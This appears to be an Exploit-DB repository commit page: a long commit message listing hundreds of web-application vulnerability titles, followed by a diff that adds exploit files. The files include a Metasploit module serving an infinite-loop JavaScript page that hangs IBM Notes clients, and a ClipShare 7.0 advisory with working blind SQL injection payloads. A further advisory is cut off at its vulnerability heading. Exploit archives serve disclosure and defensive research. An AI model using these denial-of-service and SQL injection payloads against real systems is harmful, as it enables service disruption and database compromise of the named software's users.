Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/logs.php' 'page' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/admincore.php msg' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/comments.php month' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/entries.php month' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/logs.php page' Parameter Cross-Site Scripting Cilem Haber Free Edition - 'hata.asp' 'hata' Parameter Cross-Site Scripting Cilem Haber Free Edition - 'hata.asp hata' Parameter Cross-Site Scripting ImpressPages CMS 3.6 - 'manage()' Function Remote Code Execution ImpressPages CMS 3.6 - 'manage()' Remote Code Execution EditTag 1.2 - 'edittag.cgi' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag.pl' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag_mp.cgi' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag_mp.pl' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag.cgi file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag.pl file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag_mp.cgi file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag_mp.pl file' Parameter Arbitrary File Disclosure Project'Or RIA 3.4.0 - 'objectDetail.php' 'objectId' Parameter SQL Injection Project'Or RIA 3.4.0 - 'objectDetail.php objectId' Parameter SQL Injection WordPress 2.1.1 - 'wp-includes/theme.php' 'iz' Parameter Arbitrary Command Execution Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Parameter SQL Injection WordPress 2.1.1 - 'wp-includes/theme.php iz' Parameter Arbitrary Command Execution Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php s' Parameter SQL Injection aBitWhizzy - 'whizzylink.php' 'd' Parameter Traversal Arbitrary Directory Listing aBitWhizzy - 'whizzylink.php d' Parameter Traversal Arbitrary Directory Listing PHPLive! 3.2.2 - 'super/info.php' 'BASE_URL' Parameter Parameter Cross-Site Scripting PHPLive! 3.2.2 - 'super/info.php BASE_URL' Parameter Parameter Cross-Site Scripting DotClear 1.2.x - '/ecrire/trackback.php' 'post_id' Parameter Cross-Site Scripting DotClear 1.2.x - '/tools/thememng/index.php' 'tool_url' Parameter Cross-Site Scripting DotClear 1.2.x - '/ecrire/trackback.php post_id' Parameter Cross-Site Scripting DotClear 1.2.x - '/tools/thememng/index.php tool_url' Parameter Cross-Site Scripting ToendaCMS 1.5.3 - HTTP Get And Post Forms HTML Injection ToendaCMS 1.5.3 - GET / POST Forms HTML Injection Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php' 'icodir' Parameter Traversal Arbitrary Directory Listing Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php icodir' Parameter Traversal Arbitrary Directory Listing Phorum 5.1.20 - 'admin.php' 'module[]' Parameter Full Path Disclosure Phorum 5.1.20 - 'admin.php module[]' Parameter Full Path Disclosure DynaTracker 1.5.1 - 'includes_handler.php' 'base_path' Remote File Inclusion DynaTracker 1.5.1 - 'action.php' 'base_path' Remote File Inclusion DynaTracker 1.5.1 - 'includes_handler.php base_path' Remote File Inclusion DynaTracker 1.5.1 - 'action.php base_path' Remote File Inclusion Campsite 2.6.1 - 'LocalizerConfig.php' 'g_documentRoot' Parameter Remote File Inclusion Campsite 2.6.1 - 'LocalizerLanguage.php' 'g_documentRoot' Parameter Remote File Inclusion Chamilo Lms 1.9.6 - 'profile.php' 'password0 Parameter SQL Injection Dokeos 2.2 RC2 - 'index.php' 'language' Parameter SQL Injection Campsite 2.6.1 - 'LocalizerConfig.php g_documentRoot' Parameter Remote File Inclusion Campsite 2.6.1 - 'LocalizerLanguage.php g_documentRoot' Parameter Remote File Inclusion Chamilo Lms 1.9.6 - 'profile.php password0 Parameter SQL Injection Dokeos 2.2 RC2 - 'index.php language' Parameter SQL Injection NetFlow Analyzer 5 - '/jspui/applicationList.jsp' 'alpha' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/appConfig.jsp' 'task' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/applicationList.jsp alpha' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/appConfig.jsp task' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/selectDevice.jsp' 'rtype' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/customReport.jsp' 'rtype' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/selectDevice.jsp rtype' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/customReport.jsp rtype' Parameter Cross-Site Scripting geoBlog MOD_1.0 - 'deletecomment.php' 'id' Parameter Arbitrary Comment Deletion geoBlog MOD_1.0 - 'deleteblog.php' 'id' Parameter Arbitrary Blog Deletion geoBlog MOD_1.0 - 'deletecomment.php id' Parameter Arbitrary Comment Deletion geoBlog MOD_1.0 - 'deleteblog.php id' Parameter Arbitrary Blog Deletion Web News 1.1 - 'feed.php' 'config[root_ordner]' Parameter Remote File Inclusion Web News 1.1 - 'news.php' 'config[root_ordner]' Parameter Remote File Inclusion Web News 1.1 - 'feed.php config[root_ordner]' Parameter Remote File Inclusion Web News 1.1 - 'news.php config[root_ordner]' Parameter Remote File Inclusion WebBatch - 'webbatch.exe' 'dumpinputdata' Parameter Remote Information Disclosure WebBatch - 'webbatch.exe dumpinputdata' Parameter Remote Information Disclosure AfterLogic MailBee WebMail Pro 3.x - 'default.asp' 'mode2' Parameter Cross-Site Scripting AfterLogic MailBee WebMail Pro 3.x - 'default.asp mode2' Parameter Cross-Site Scripting phpMyAdmin 2.11.1 - setup.php Cross-Site Scripting phpMyAdmin 2.11.1 - 'setup.php' Cross-Site Scripting Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php' 'level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php' 'level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php' 'level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php' 'level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php' 'level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php level' Parameter Remote File Inclusion Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php level' Parameter Remote File Inclusion Absolute News Manager .NET 5.1 - 'pages/default.aspx' 'template' Parameter Remote File Access Absolute News Manager .NET 5.1 - 'pages/default.aspx template' Parameter Remote File Access MyBlog 1.x - 'Games.php' 'ID' Remote File Inclusion MyBlog 1.x - 'Games.php ID' Remote File Inclusion Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp' 'resultsForm' Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp' 'helpUrl' Parameter Remote Frame Injection Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp' 'activeControl' Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp resultsForm' Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp helpUrl' Parameter Remote Frame Injection Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp activeControl' Parameter Cross-Site Scripting WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc' 'camnum' Parameter Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic' 'id' Parameter Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc camnum' Parameter Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic id' Parameter Arbitrary Memory Disclosure CiMe - Citas Médicas - Multiple Vulnerabilities CiMe Citas Médicas - Multiple Vulnerabilities Elastic Path 4.1 - 'manager/FileManager.jsp' 'dir' Parameter Traversal Arbitrary Directory Listing Elastic Path 4.1 - 'manager/FileManager.jsp dir' Parameter Traversal Arbitrary Directory Listing osCommerce 2.3.3.4 - 'geo_zones.php' 'zID' Parameter SQL Injection osCommerce 2.3.3.4 - 'geo_zones.php zID' Parameter SQL Injection Concrete5 CMS 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection Concrete5 CMS 5.6.2.1 - 'index.php cID' Parameter SQL Injection WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php' 'track' Parameter SQL Injection WordPress Plugin AdRotate 3.9.4 - 'clicktracker.ph track' Parameter SQL Injection PHPEasyData 1.5.4 - admin/login.php 'Username' Field SQL Injection PHPEasyData 1.5.4 - 'admin/login.php Username' SQL Injection PHP Ticket System Beta 1 - 'get_all_created_by_user.php' 'id' Parameter SQL Injection PHP Ticket System Beta 1 - 'get_all_created_by_user.php id' Parameter SQL Injection webERP 4.11.3 - 'SalesInquiry.php' 'SortBy' Parameter SQL Injection webERP 4.11.3 - 'SalesInquiry.php SortBy' Parameter SQL Injection Claroline 1.8.9 - 'claroline/redirector.php' 'url' Parameter Arbitrary Site Redirect Claroline 1.8.9 - 'claroline/redirector.php url' Parameter Arbitrary Site Redirect XOOPS 2.0.18 - 'modules/system/admin.php' 'fct' Parameter Traversal Local File Inclusion XOOPS 2.0.18 - 'modules/system/admin.php fct' Parameter Traversal Local File Inclusion ownCloud 4.0.x/4.5.x - 'upload.php' 'Filename' Parameter Remote Code Execution ownCloud 4.0.x/4.5.x - 'upload.php Filename' Parameter Remote Code Execution InterWorx Control Panel 5.0.13 build 574 - 'xhr.php' 'i' Parameter SQL Injection InterWorx Control Panel 5.0.13 build 574 - 'xhr.php i' Parameter SQL Injection MKPortal 1.2.1 - '/modules/rss/handler_image.php' 'i' Parameter Cross-Site Scripting MKPortal 1.2.1 - '/modules/rss/handler_image.php i' Parameter Cross-Site Scripting glFusion 1.1 - Anonymous Comment 'Username' Field HTML Injection glFusion 1.1 - Anonymous Comment 'Username' HTML Injection IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Function Cross-Site Scripting IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Cross-Site Scripting kitForm CRM Extension 0.43 - 'sorter.ph' 'sorter_value' Parameter SQL Injection kitForm CRM Extension 0.43 - 'sorter.ph sorter_value' Parameter SQL Injection dompdf 0.6.0 - 'dompdf.php' 'read' Parameter Arbitrary File Read dompdf 0.6.0 - 'dompdf.php read' Parameter Arbitrary File Read WordPress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting DiamondList - '/user/main/update_settings' 'setting[site_title]' Parameter Cross-Site Scripting DiamondList - '/user/main/update_category' 'category[description]' Parameter Cross-Site Scripting DiamondList - '/user/main/update_settings setting[site_title]' Parameter Cross-Site Scripting DiamondList - '/user/main/update_category category[description]' Parameter Cross-Site Scripting vBulletin 4.0.x < 4.1.2 - 'search.php' 'cat' Parameter SQL Injection vBulletin 4.0.x < 4.1.2 - 'search.php cat' Parameter SQL Injection MybbCentral TagCloud 2.0 - 'Topic' Field HTML Injection MybbCentral TagCloud 2.0 - 'Topic' HTML Injection Cacti 0.8.7 (RedHat High Performance Computing - HPC) - utilities.php filter Parameter Cross-Site Scripting Cacti 0.8.7 (RedHat High Performance Computing [HPC]) - 'utilities.php' Filter Parameter Cross-Site Scripting Mulitple WordPress Themes - 'admin-ajax.php' 'img' Parameter Arbitrary File Download Mulitple WordPress Themes - 'admin-ajax.php img' Parameter Arbitrary File Download Free Arcade Script 1.0 - 'search' Field Cross-Site Scripting Free Arcade Script 1.0 - 'search' Cross-Site Scripting Micro CMS 1.0 - 'name' Field HTML Injection Micro CMS 1.0 - 'name' HTML Injection MODx manager - '/controllers/default/resource/tvs.php' 'class_key' Parameter Traversal Local File Inclusion MODx manager - '/controllers/default/resource/tvs.php class_key' Parameter Traversal Local File Inclusion Bacula-Web 5.2.10 - 'joblogs.php' 'jobid Parameter SQL Injection Bacula-Web 5.2.10 - 'joblogs.php jobid Parameter SQL Injection PHP Scripts Now Riddles - '/riddles/results.php' 'searchQuery' Parameter Cross-Site Scripting PHP Scripts Now Riddles - '/riddles/list.php' 'catid' Parameter SQL Injection PHP Scripts Now Riddles - '/riddles/results.php searchQuery' Parameter Cross-Site Scripting PHP Scripts Now Riddles - '/riddles/list.php catid' Parameter SQL Injection W-Agora 4.2.1 - 'search.php3' 'bn' Parameter Traversal Local File Inclusion W-Agora 4.2.1 - 'search.php3 bn' Parameter Traversal Local File Inclusion Piwigo 2.6.0 - 'picture.php' 'rate' Parameter SQL Injection Piwigo 2.6.0 - 'picture.php rate' Parameter SQL Injection PHPMyRecipes 1.2.2 - 'dosearch.php' 'words_exact Parameter SQL Injection PHPMyRecipes 1.2.2 - 'dosearch.php words_exact Parameter SQL Injection PHPMyRecipes 1.2.2 - 'browse.php' 'category' Parameter SQL Injection PHPMyRecipes 1.2.2 - 'browse.php category' Parameter SQL Injection Dolibarr ERP/CRM - '/user/info.php' 'id' Parameter SQL Injection Dolibarr ERP/CRM - '/admin/boxes.php' 'rowid' Parameter SQL Injection Dolibarr ERP/CRM - '/user/info.php id' Parameter SQL Injection Dolibarr ERP/CRM - '/admin/boxes.php rowid' Parameter SQL Injection PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php' 'Expedition' Parameter Cross-Site Scripting PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition' Parameter Cross-Site Scripting Manx 1.0.1 - '/admin/admin_blocks.php' 'Filename' Parameter Traversal Arbitrary File Access Manx 1.0.1 - '/admin/admin_pages.php' 'Filename' Parameter Traversal Arbitrary File Access Manx 1.0.1 - '/admin/admin_blocks.php Filename' Parameter Traversal Arbitrary File Access Manx 1.0.1 - '/admin/admin_pages.php Filename' Parameter Traversal Arbitrary File Access UBBCentral UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting UBBCentral UBB.Threads 7.5.6 - 'Username' Cross-Site Scripting OSClass 2.3.3 - 'index.php' 'getParam()' Function Multiple Parameter Cross-Site Scripting OSClass 2.3.3 - 'index.php getParam()' Multiple Parameter Cross-Site Scripting 11in1 CMS 1.2.1 - 'index.php' 'class' Parameter Traversal Local File Inclusion 11in1 CMS 1.2.1 - 'admin/index.php' 'class' Parameter Traversal Local File Inclusion 11in1 CMS 1.2.1 - 'index.php class' Parameter Traversal Local File Inclusion 11in1 CMS 1.2.1 - 'admin/index.php class' Parameter Traversal Local File Inclusion Dotclear 2.4.1.2 - '/admin/auth.php' 'login_data' Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/blogs.php' 'nb' Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/auth.php login_data' Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/blogs.php nb' Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/plugin.php' 'page' Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/plugin.php page' Parameter Cross-Site Scripting Fork CMS 3.x - 'backend/modules/error/actions/index.php' 'parse()' Function Multiple Parameter Error Display Cross-Site Scripting Fork CMS 3.x - 'backend/modules/error/actions/index.php parse()' Multiple Parameter Error Display Cross-Site Scripting 11in1 CMS 1.2.1 - 'admin/comments' 'topicID' Parameter SQL Injection 11in1 CMS 1.2.1 - 'admin/tps' 'id' Parameter SQL Injection 11in1 CMS 1.2.1 - 'admin/comments topicID' Parameter SQL Injection 11in1 CMS 1.2.1 - 'admin/tps id' Parameter SQL Injection SAP Business Objects InfoView System - '/help/helpredir.aspx' 'guide' Parameter Cross-Site Scripting SAP Business Objects InfoView System - '/webi/webi_modify.aspx' 'id' Parameter Cross-Site Scripting SAP Business Objects InfoView System - '/help/helpredir.aspx guide' Parameter Cross-Site Scripting SAP Business Objects InfoView System - '/webi/webi_modify.aspx id' Parameter Cross-Site Scripting Wikidforum 2.10 - Advanced Search - Multiple Field SQL Injection Wikidforum 2.10 - Advanced Search Multiple Field SQL Injection Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php' 'String::stripUnsafeHtml()' Method Cross-Site Scripting Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml()' Method Cross-Site Scripting TeamPass 2.1.5 - 'login' Field HTML Injection TeamPass 2.1.5 - 'login' HTML Injection XOOPS 2.5.4 - '/modules/pm/pmlite.php' 'to_userid' Parameter Cross-Site Scripting XOOPS 2.5.4 - '/modules/pm/pmlite.php to_userid' Parameter Cross-Site Scripting Kajona - 'getAllPassedParams()' Function Multiple Cross-Site Scripting Vulnerabilities Kajona - 'getAllPassedParams()' Multiple Cross-Site Scripting Vulnerabilities PolarisCMS - 'WebForm_OnSubmit()' Function Cross-Site Scripting PolarisCMS - 'WebForm_OnSubmit()' Cross-Site Scripting TCExam 11.2.x - '/admin/code/tce_edit_question.php' 'subject_module_id' Parameter SQL Injection TCExam 11.2.x - '/admin/code/tce_edit_question.php subject_module_id' Parameter SQL Injection jCore - '/admin/index.php' 'path' Parameter Cross-Site Scripting jCore - '/admin/index.php path' Parameter Cross-Site Scripting Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection Cyberoam Firewall CR500iNG-XP 10.6.2 MR-1 - Blind SQL Injection WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf' 'abouttext' Parameter Cross-Site Scripting WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext' Parameter Cross-Site Scripting cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html' 'acct' Parameter Cross-Site Scripting cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html acct' Parameter Cross-Site Scripting WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php' 'reqID' Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php' 'reqID' Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php' 'reqID' Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID' Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID' Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID' Parameter SQL Injection Kallithea 0.2.9 - (came_from) HTTP Response Splitting PHP Address Book - '/addressbook/register/delete_user.php' 'id' Parameter SQL Injection PHP Address Book - '/addressbook/register/edit_user.php' 'id' Parameter SQL Injection Kallithea 0.2.9 - 'came_from' HTTP Response Splitting PHP Address Book - '/addressbook/register/delete_user.php id' Parameter SQL Injection PHP Address Book - '/addressbook/register/edit_user.php id' Parameter SQL Injection PHP Address Book - '/addressbook/register/linktick.php' 'site' Parameter SQL Injection PHP Address Book - '/addressbook/register/linktick.php site' Parameter SQL Injection PHP Address Book - '/addressbook/register/router.php' 'BasicLogin' Cookie Parameter SQL Injection PHP Address Book - '/addressbook/register/traffic.php' 'var' Parameter SQL Injection PHP Address Book - '/addressbook/register/user_add_save.php' 'email' Parameter SQL Injection PHP Address Book - '/addressbook/register/checklogin.php' 'Username' Parameter SQL Injection PHP Address Book - '/addressbook/register/admin_index.php' 'q' Parameter SQL Injection PHP Address Book - '/addressbook/register/router.php BasicLogin' Cookie Parameter SQL Injection PHP Address Book - '/addressbook/register/traffic.php var' Parameter SQL Injection PHP Address Book - '/addressbook/register/user_add_save.php email' Parameter SQL Injection PHP Address Book - '/addressbook/register/checklogin.php Username' Parameter SQL Injection PHP Address Book - '/addressbook/register/admin_index.php q' Parameter SQL Injection Hero Framework - '/users/login' 'Username' Parameter Cross-Site Scripting Hero Framework - '/users/forgot_password' 'error' Parameter Cross-Site Scripting Hero Framework - '/users/login Username' Parameter Cross-Site Scripting Hero Framework - '/users/forgot_password error' Parameter Cross-Site Scripting Jahia xCM - '/engines/manager.jsp' 'site' Parameter Cross-Site Scripting Jahia xCM - '/engines/manager.jsp site' Parameter Cross-Site Scripting NeoBill - '/modules/nullregistrar/PHPwhois/example.php' 'query' Parameter Remote Code Execution NeoBill - '/modules/nullregistrar/PHPwhois/example.php query' Parameter Remote Code Execution C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp' 'pa' Parameter SQL Injection C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp pa' Parameter SQL Injection Command School Student Management System - '/sw/admin_grades.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_terms.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_school_years.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_sgrades.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_media_codes_1.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_infraction_codes.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_generations.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_relations.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_titles.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/health_allergies.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_school_names.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_subjects.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_grades.php id' Parameter SQL Injection Command School Student Management System - '/sw/admin_terms.php id' Parameter SQL Injection Command School Student Management System - '/sw/admin_school_years.php id' Parameter SQL Injection Command School Student Management System - '/sw/admin_sgrades.php id' Parameter SQL Injection Command School Student Management System - '/sw/admin_media_codes_1.php id' Parameter SQL Injection Command School Student Management System - '/sw/admin_infraction_codes.php id' Parameter SQL Injection Command School Student Management System - '/sw/admin_generations.php id' Parameter SQL Injection Command School Student Management System - '/sw/admin_relations.php id' Parameter SQL Injection Command School Student Management System - '/sw/admin_titles.php id' Parameter SQL Injection Command School Student Management System - '/sw/health_allergies.php id' Parameter SQL Injection Command School Student Management System - '/sw/admin_school_names.php id' Parameter SQL Injection Command School Student Management System - '/sw/admin_subjects.php id' Parameter SQL Injection Dredge School Administration System - '/DSM/loader.php' 'Id' Parameter SQL Injection Dredge School Administration System - '/DSM/loader.php Id' Parameter SQL Injection UAEPD Shopping Script - '/news.php' 'id' Parameter SQL Injection UAEPD Shopping Script - '/news.php id' Parameter SQL Injection BloofoxCMS - '/bloofox/index.php' 'Username' Parameter SQL Injection BloofoxCMS - '/bloofox/admin/index.php' 'Username' Parameter SQL Injection BloofoxCMS - '/bloofox/index.php Username' Parameter SQL Injection BloofoxCMS - '/bloofox/admin/index.php Username' Parameter SQL Injection Xangati - '/servlet/Installer' 'file' Parameter Directory Traversal Xangati - '/servlet/Installer file' Parameter Directory Traversal Caldera - '/costview2/jobs.php' 'tr' Parameter SQL Injection Caldera - '/costview2/printers.php' 'tr' Parameter SQL Injection Caldera - '/costview2/jobs.php tr' Parameter SQL Injection Caldera - '/costview2/printers.php tr' Parameter SQL Injection OL-Commerce - '/OL-Commerce/affiliate_signup.php' 'a_country' Parameter SQL Injection OL-Commerce - '/OL-Commerce/affiliate_show_banner.php' 'affiliate_banner_id' Parameter SQL Injection OL-Commerce - '/OL-Commerce/create_account.php' 'country' Parameter SQL Injection OL-Commerce - '/OL-Commerce/admin/create_account.php' 'entry_country_id' Parameter SQL Injection OL-Commerce - '/OL-Commerce/affiliate_signup.php a_country' Parameter SQL Injection OL-Commerce - '/OL-Commerce/affiliate_show_banner.php affiliate_banner_id' Parameter SQL Injection OL-Commerce - '/OL-Commerce/create_account.php country' Parameter SQL Injection OL-Commerce - '/OL-Commerce/admin/create_account.php entry_country_id' Parameter SQL Injection Disc ORGanizer - DORG - Multiple Vulnerabilities Disc ORGanizer (DORG) - Multiple Vulnerabilities Apache < 2.2.34 / < 2.4.27 - HTTP OPTIONS Memory Leak Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak ClipShare 7.0 - SQL Injection Complain Management System - Hard-Coded Credentials / Blind SQL injection
This commit is contained in:
Offensive Security
parent
b49ee665d7
commit
b77b178de0
6 changed files with 779 additions and 530 deletions
63
platforms/multiple/dos/42969.rb
Executable file
63
platforms/multiple/dos/42969.rb
Executable file
|
|
@ -0,0 +1,63 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "IBM Notes encodeURI DOS",
|
||||
'Description' => %q(
|
||||
This module exploits a vulnerability in the native browser that
|
||||
comes with IBM Lotus Notes.
|
||||
If successful, it could cause the Notes client to hang and have
|
||||
to be restarted.
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Dhiraj Mishra',
|
||||
],
|
||||
'References' => [
|
||||
[ 'EXPLOIT-DB', '42602'],
|
||||
[ 'CVE', '2017-1129' ],
|
||||
[ 'URL', '
|
||||
http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
|
||||
],
|
||||
'DisclosureDate' => 'Aug 31 2017',
|
||||
'Actions' => [[ 'WebServer' ]],
|
||||
'PassiveActions' => [ 'WebServer' ],
|
||||
'DefaultAction' => 'WebServer'
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def run
|
||||
exploit # start http server
|
||||
end
|
||||
|
||||
def setup
|
||||
@html = %|
|
||||
<html><head><title>DOS</title>
|
||||
<script type="text/javascript">
|
||||
while (true) try {
|
||||
var object = { };
|
||||
function d(d0) {
|
||||
var d0 = (object instanceof encodeURI)('foo');
|
||||
}
|
||||
d(75);
|
||||
} catch (d) { }
|
||||
</script>
|
||||
</head></html>
|
||||
|
|
||||
end
|
||||
|
||||
def on_request_uri(cli, _request)
|
||||
print_status('Sending response')
|
||||
send_response(cli, @html)
|
||||
end
|
||||
end
|
||||
|
||||
|
|
@ -174,7 +174,7 @@ $packet.="Host: ".$host."\r\n";
|
|||
$packet.="Cookie: ".$cookie."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
sendpacketii($packet);
|
||||
$temp=explode("index.php?op=profile&user=",$html);
|
||||
$temp=explode("index.php?op=profile&user=",$html);
|
||||
for ($kk=1; $kk<count($temp); $kk++)
|
||||
{
|
||||
$temp[$kk]=str_replace("\"","",$temp[$kk]);
|
||||
|
|
|
|||
41
platforms/php/webapps/42967.txt
Executable file
41
platforms/php/webapps/42967.txt
Executable file
|
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: ClipShare v7.0 - SQL Injection
|
||||
# Date: 2017-10-09
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: http://www.clip-share.com/
|
||||
# Software Link: http://www.clip-share.com/
|
||||
# Version: 7.0
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-10-09
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
ClipShare is the first and most popular PHP video script for building highly-profitable video sharing websites.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
SQL injection on [category] URI parameter.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
SQLi:
|
||||
|
||||
https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
|
||||
|
||||
Parameter: #1* (URI)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: https://localhost/[path]/videos/[category]' AND SLEEP(5) AND 'xNCN'='xNCN
|
||||
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
||||
58
platforms/php/webapps/42968.txt
Executable file
58
platforms/php/webapps/42968.txt
Executable file
|
|
@ -0,0 +1,58 @@
|
|||
# Exploit Title : Complain Management System Blind SQL Injection
|
||||
# Date: 10 October 2017
|
||||
# Exploit Author: havysec
|
||||
# Tested on: ubuntu14.04
|
||||
# Vendor: https://sourceforge.net/projects/complain-management-system/
|
||||
# Version: not supplied
|
||||
# Download Software: https://sourceforge.net/projects/complain-management-system/files
|
||||
|
||||
|
||||
## About The Product :
|
||||
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.
|
||||
|
||||
## Vulnerability :
|
||||
